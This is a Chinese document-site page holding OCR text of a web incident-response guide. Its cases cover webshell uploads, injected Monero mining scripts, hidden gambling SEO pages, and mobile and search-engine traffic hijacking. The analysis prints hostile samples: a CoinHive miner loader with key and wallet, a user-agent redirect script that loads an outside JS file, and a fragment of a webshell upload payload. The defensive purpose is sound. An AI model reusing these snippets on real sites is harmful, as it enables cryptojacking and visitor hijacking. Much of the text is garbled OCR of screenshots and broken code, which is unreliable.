2023实战web应急响应流程.docx

上传人:夺命阿水 文档编号:1340369 上传时间:2024-06-06 格式:DOCX 页数:23 大小:280.35KB
返回 下载 相关 举报
2023实战web应急响应流程.docx_第1页
第1页 / 共23页
2023实战web应急响应流程.docx_第2页
第2页 / 共23页
2023实战web应急响应流程.docx_第3页
第3页 / 共23页
2023实战web应急响应流程.docx_第4页
第4页 / 共23页
2023实战web应急响应流程.docx_第5页
第5页 / 共23页
点击查看更多>>
资源描述

《2023实战web应急响应流程.docx》由会员分享,可在线阅读,更多相关《2023实战web应急响应流程.docx(23页珍藏版)》请在课桌文档上搜索。

1、实战Web应急响应流程项目介绍面对各种各样的安全事件,我们该怎么处理?这是一个关于安全事件应急响应的项目,从系统入侵到事件处理,收集和整理了一些案例进行分析。我将持续更新这份笔记,希望能帮到有需要的人。如果你看到好的案例,欢迎通过issue提交,欢迎Star予以支持。第1篇:网站被植入WebShell网站被植入webshell意味着网站存在可利用的高危漏洞,攻击者通过利用漏洞入侵网站写入webshell接管网站的控制权。为了得到权限常规的手段如:前后台任意文件上传远程命令执行Sql注入写入文件等。现象描述网站管理员在站点目录下发现存在WebSheIl于是开始了对入侵过程展开了分析。;瑚位置Dt

2、rr检测英把I口本+EK网Sl列出障M本口不展示低级别脚本(IeDM显示Zf助密|目|W掾目录.一文件I0别I说明大小I修改时间骋证值5MrtxbimJa1.zWjSEg/V4U*WInewv.sso.)Global.asnewv.web.回Web.confi大,1I3I1I3I1I43I8I1I1I1I1I1I1I1I1I1IfO556fDb-3daf50ba-45c8edda:eba08302-abce0279-1m2、Web日志分析经过日志分析,在文件创建的时间节点并未发现可疑的上传,但发现存在可疑的WebSerViCe接口2017-07-0717:01:49210.53POST/Sma

3、rtExa11fIleserviceZFileManaae.as11uc80-10.16.65.4Mozilla/4.0(co11pa2017-07-0717:01:57210.S3POSTSmartExaxnfIleserviceZFlleManage.asmx-80-10.16.65.4Mozilla/4.0(compa2017-07-0717:02:05210.53POST/SmarcExa11fileservice/FileManage.aamx-80-10.16.65.4Mozilla/4.0+(cota3、漏洞分析WSO1.1.oader访问webservice接口发现变量:buf

4、ferdistinctpach、newfiIename可以在客声端自定义TestRequestPlugmConfigurationAttackOverview1.ogExpertViewConfigurationWSD1.OperationInterfaceFiIeManageSoapI?UpIoadFiIeNameParentsValueIemtxjffersoapEnvelope-soapBody-IemUpIoadFileIDWlQCBQYWaHEXhbmdIYWdP.ternsoapBody-temUpioadFiIeDAsmartexamWebtemnewFileNameSoapEn

5、veIope-soap.BodytemUploadFile22.aspxRequestInputTableRequestExpertView4、漏洞复现尝试对漏洞进行复现,可成功上传WebShell控制网站服务器WSD1.1.oaderTestRequestPtugmConRgurationAHackOverview1.ogExpertViewConfigurationUR1.EndpointhttpmartE311VeservceFleManageasmxXM1.RequestAdditionalHTTPRequestHeadersC101p,ftwlQpOeP*tlp33.orW35oip

6、.wv.iop*htp:/tfpuri.or.,.lDwlQCBQYWdliexhbllvwdlPS3Kc2NyaX8eiiU+PCVl(taFsKFJlcXVlc3QuSXRlbV$iY2hvcH81ciJdD:smarteaaWeb22.asp?XM1.ResponseHTTPResponseHeadersSend臼,2BrtXMOApp-rwxws2012-04-270823420一SOmQ林P-Codo2O11-12-X09.48310-一Jp-BrsrsQAp-Tkert20ll-W-14IO47500三_App-TKx_*spnt.elint日M2012-12-292318580*

7、UUtti2011-12-J213200一匕Mn2016-07-141554.210一二6Ut4i”口Oiutoaize20U-12-12H07.470-U4istt(iist2012-03-21089400一匕“Qr*2011-12-1213:07:3?0一Ofilroott*filservic已filerot2O17-O9-t1444IO0-Clfr*orkOfil*snQttyl2012-03-22IIoIa0三5、漏洞修复清除webshell并对webservice接口进行代码修复。从发现WebShell到日志分析,再到漏洞复现和修复,本文暂不涉及溯源取证方面。第2篇:罗币恶意挖矿口罗

8、币(MOnerO或XMR),它是一个非常注重于隐私、匿名性和不可跟踪的加密数字货币。只需在网口中配置好js脚本,打开网口就可以挖矿,是一种非常简单的挖矿方式,而通过这种恶意挖矿获取数字货币是黑灰色产业获取收益的重要途径。现象描述利用XMR恶意挖矿,会大量占用用声的CPU资源,严重影响了网站的用声体验。从08/09日0点开始局域网内某IP访问网站口面会触发安全预警,只要访问此服务器上的网口,CPU直线上升100%20ia-0S-0909:05:1621.19.56172.O0.37MMR62516SlRWsco1nainr.C0XMtv.9F-JS-MTTF(Response)2O18-OS-O

9、903:15:262.169.100172.:,37网61116SIRS:C0lna1n*r.COIkMivt.9F*JS-HTTP(Rspons)201S-0S-09OS:O5:212IM.100172.VBMR60882SA:colner.coiMiv.F-JS-MTTp(Response)2011-01-0907:30:14;7.1.21717?,.vMAMlMSlRWsco1rarinr.COXKHXvt.9F-JS-HTTF(Kespoasc)201-08-09M:24:S821Ul9.5617217易M网58726SSflV:COlrwIntr.COIMXV(.9F-JS-MTTF

10、(Rspo11s)2(Hflkoe806:19:527.100172.:.37MRMS17ASAVtco1rwinrCOnMXvS-s-XHB0B0906:14:532;V169.100m.O.HBUM58411e*n:Coinainer.coxhive.SMF-JS-HTTP(Rspom)2O1-O-O905:49:4727U.1M.561.0.17MA579*9Slrt三:C1n1nr,coiHXvs.9*f-J5-http(Response)20X-0-0905:34:4427IIM.56172.2.37MR57SM三WsC1nnr-COXMXV.SMF-J5-HTTP(Response

11、)2O1-O-O905:19:392I169.77172.203757251A5:col111nr.Coinkxvk.SMF-JS-HTTF(spons)问题解析通过获取恶意网口url对网口口面进行分析,发现网站口面被植入在线口罗币挖矿代码:varscript=document.createElement(script);script,onload三function()/XMRPoolhashvarmnewCoinHive.Anonymous(BuSbODwUSryGnrIwy3o6Fhz1wsdz3ZNu,);/TODO:Replacethebelowstringwithwalletstri

12、ngm.start(,47DuV1.9UuD1gEk3M4Wge1BwQyadQs5fTew8Q3Cxi95c8W7tKTXykgDfj7HVr9aCzzUNb9vA6eZ3eJCXE9yzhmTn1bjACGK,);script.src=document.head.appendChild(script);删除js里面的恶意代码网站被XMR恶意挖矿服务器已经被攻击进一步做服务器入侵排查。第3篇:批量挂黑口作为一个网站管理员,你采用开源CMS做网站比如dedeems,但是有一天,你忽然发现不知何时网站的友情链接模块被挂大量垃圾链接网站出现了很多不该有的目录里面全是博彩相关的网口。而且,攻击者在挂

13、黑口以后会在一些小论坛注册甲将你的网站黑链接发到论坛,引爬虫收录。在搜索引擎搜索网站地址时收录了一些会出现一些博彩口面,严重影响了网站形象。原因分析网站存在高危漏洞,常口于一些存在安全漏洞的开源CMS利用Oday批量拿站上传黑口。现象描述:某网站被挂了非常多博彩链接链接形式如下:http:WWWh(tp:/链接可以访问,直接访问物理路径也可以看到文件但是打开W站目录并没有发现这些文件这些文件到底藏在了哪?访问这些链接跳转到如图面:澳门赌场在线赌博栏目列表888不域最新文章 皿 总咚充赌城博世bode$ 网上上人凫博 网上七人赌博 -. 三八杠 篮好开 葡亭赌场开户 ,斯维加斯赌就问题处理:1、

14、打开电脑文件夹选项卡,取消隐藏受保护的操作系统文件勾选把隐藏攵件和文件夹下面的单选选择显示隐藏的文件文件夹和驱动器。文件夹选项常规查看I搜索I文件夹标图中O应用到文件夹方1重一文件夹(R)高级设置:-始终显示菜单3始终显示图标,从不显示缩略图 鼠标指向文件夹和桌面项时显示提示信息显示驱动器号,回隐藏计算机文件夹中的空驱动器, 隐藏受保护的操作系统文件(推荐)隐藏下件和下件正O不显示隐藏的文件、文件夹或驱动器显示隐藏的文件、文件夹和驱动器 隐藏已知文件类型的扩展名 用彩色显示加密或压缩的HTFS文件二还原为默认值S)I确定I取消I应用R2、再次查看可以看到半透明的文件夹,清楚隐藏文件夹及所有面共

15、享亥爆新增文件夹领4I修改日期I类型I大小40(nendduchwzxi皿2018/7/3112:39文件夹aoexdduchanaixiaxtdobo2018/7/3112:39文件夹aomexzhenguidubOwangzhan2018/7/3112:39文件夹AITPng2018/6/2315:40PNG图像19KBD1-2pn2018/6/2315:45PKG图像17KB丸1-3png2018/6/2316:21PNG图像18KB3、然后清除11S临时压缩文件C:inetpubtempIISTemporaryCompressedFilesWEBUI$A_gzip_DAWEBWEBUI

16、UP1.OADintpubtspIISTmporaryCcnpressedFilz,YEBUIJ,-gzip-D*三BYZBVIUP1.OADGW1.OAD组织包含到除中共学,刻录新建文件关滂-ECat名碰日期型大小下我,.MfinrovawJGZAIJaAM201873110:59文件夹JS面CflaroUKMGZAI11AMDUKI2016/7/3110:59文件夹.最近访诃的位置二.MaDfZJgGWIDUTONASRKAlf2018/7/3110:59文件夹X库入BAIJIA1.E2016/7/3110:59文件夹H祇频上BOCAItrANG2018/7/3110:59文件夹回图片.B

17、OCAIWASGZKmfiVAJl2016/7/3110:59文件夹,.DMA2018/7/3110:59文件夹.DAFA88GVAMFWfU2018/7/3110:59文件夹d计苴机DAFA86811AZI2018/7/3110:59文件实.Dafapukb20iV3i10:59文件夹Q网S.DUBO2018/7/3110:59文件夹._一1.全部都是博彩链接Dubokaimv20i3iio:S9文件夹ERBAGAMG2018/7/310:59文件夹JkKRBACMfGDUBO2018/7/3110:59文件夹.MUAKESHAm(UAInUMG2018/7/3110:59文件夹.KMAKE

18、SxAm(UASGNlCKMrcKAImr2018/7/3110:59文件夹J.MUAKESMAmaIWmOnfgIHU201873110:59文件夹4、投诉快照,申请删除相关的网口收录,减少对网站的影响。第4篇:新闻源网站劫持新闻源到站一般权重较高收录快,能够被搜索引擎优先收录,是黑灰产推广引流的必争之地,很容易成为被攻击的对象。被黑以后主要挂的不良信息内容主要是博彩六合彩等赌博类内容新闻源阳站程序无论是自主开发的还是开源程序,都有被黑的可能,开源程序更容易被黑。现象描述:某新闻源网站首口广告链接被劫持到菠菜网站有三个广告专题,链接形式如下:点击这三条链接会跳转到博彩网站。简单抓包分析一下过

19、程:可以发现此时这个返回口面已被劫持,并且加载了第三方js文件http:/xn-dpqw2zokj.eom/N/js/dt.js进一步访问该文件:INTv三SQ1.*XSSEncryption*Encoding-Other-B1.oadUR1.httpxn-dpqw2zokj.coSPIitUR1.U)Execute口EnablePostdata口EnableReferrervar_hmt=_hmtI;(functionOvarhm-document.CreateElement(*script*);hm.src=*s.parentNode.InsertBefore(hm,s);)0:docum

20、ent,writein(*);document,writein(functionbrowserRdirecO(*);document,writeln(*document,writeln(*document.WriteIn(document,writeln(*document.WriteIn(document.WriteInedocument.WriteIn(document,writeln(document,writeln(*document,wrieln(*document,writeln(*document.Writeln(docu11ent.writeln(*document,write

21、ln(*varSUSerAgent=navigator.userAgent.to1.owerCaseO;*);varblslpad=sUserAgent.match(ipad/i)ipadvarblslphone0s=sUserAgen.match(/iphoneosi)=,iphoneos,varblsMidp三sUserAgent.match(三idpi)=midp:):varbIsUc7=sUserAgent.match(rv:1.2.3.4i)=rv:1.2.3.4varblsUc=sUserAgent.aatch(ucwebi)=,ucweb,;*):varblsndroid=sUs

22、erAgent.match(/android/i)=,android,;*);varblsCE=sUserAgent.match(/windowscei),windowscevarblsWM=sUserAgent.match(/windowsmobile/i)=,vindovsmobile;*);日!(blslpadIlblslphon0bIMiIlbl$&7I1.bISUC11bisAndroid11blsCE11blsVM)*);window,location,href=,https:/cm11:);document.WriteIn();document,writein(browserRe

23、directO;*);document,wrieln(*):else);window,location,href=,https:,.co/;我们可以发现,攻击者通过这段js代码判断手机访问来源,劫持移动端(如手机、ipad、Android等)流量,跳转到进一步访问跳转到赌博网站:lodUR1.htt262706fccomi2皿cvtQEnablePortdMOEnb*eRrrc第6篇:搜索引擎劫持当你直接打开阳址访问M站是正常的可是当你在搜索引擎结果口中打开网站时,会跳转到-些其他刑站It如博彩,虚假告淘宝搜索面等。是的,你可能了遇到搜索引擎劫持。现象描述从搜索引擎来的流量自动跳转到指定的网通

24、过对index.php文件进行代码分析,发现该文件代码对来自搜狗和好搜的访问进行流量劫持。早PhPerror_rporting():ifOtristr(trtolower(S-SERVRT?.JF?-:HT,),c;:;-)tritr(S_SERVERHTTP?-:=Tr.P.,-,stritr.113.1113.1.113.1,113.113.113.J.113.:;.;113.:.113.113,.113. *.:113.1. 2113.:2.-18/Apr/2018:19:15:48+0800POSTcssskin3image.jspHTTP/1.1302-18/Apr/2018:19:

25、15:48+0800GET/error.htmlHTTP/1.1200483-18/Apr/2018:19:16:00+0800POSTcssskin3image.jspHTTP/1.1200433-18/Apr/2018:19:16:50+0800POSTcssskin3image.jspHTTP/1.1200433-(18/Apr/2018:19:16:59+0800POSTcssskin3image.jspHTTP/1.1302一-18/Apr/2018:19:17:00+0800GET/error.htmlHTTP/1.1200483-18/Apr/2018:19:17:40+0800

26、POSTcssskin3image.jspHTTP/1.1302-18/Apr/2018:19:17:40+0800-GET/error.htmlHTTP/1.1200483-18/Apr/2018:19:15:19-18/Apr/2018:19:18:10-18/Apr/2018:19:24:24-18/Apr/2018:19:24:31-18/Apr/2018:19:24:32-18/Apr/2018:19:24:32-18/Apr/2018:19:24:33+0800+0800+0800+0800+0800+0800GETGETGETGETGETGETjsjquerytipsytip.jspHTTP/1.120010/images/ddby.jpgHTTP/1.120013132/images/ddby.jpgHTTP/1.1304-ZtemplatesZpicshow.jspHTTP/1.12003590templateshead.jspHTTP/1.12009899imagessearch.jpgHTTP/1.1404636进一步审查所有的日志文件(日志保存时间从2017-04-20至2018-04-19),发现一共只有两次访问image.jsp文件的记录,分别是2018-04-18和2017

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > 在线阅读 > 生活休闲


备案号:宁ICP备20000045号-1

经营许可证:宁B2-20210002

宁公网安备 64010402000986号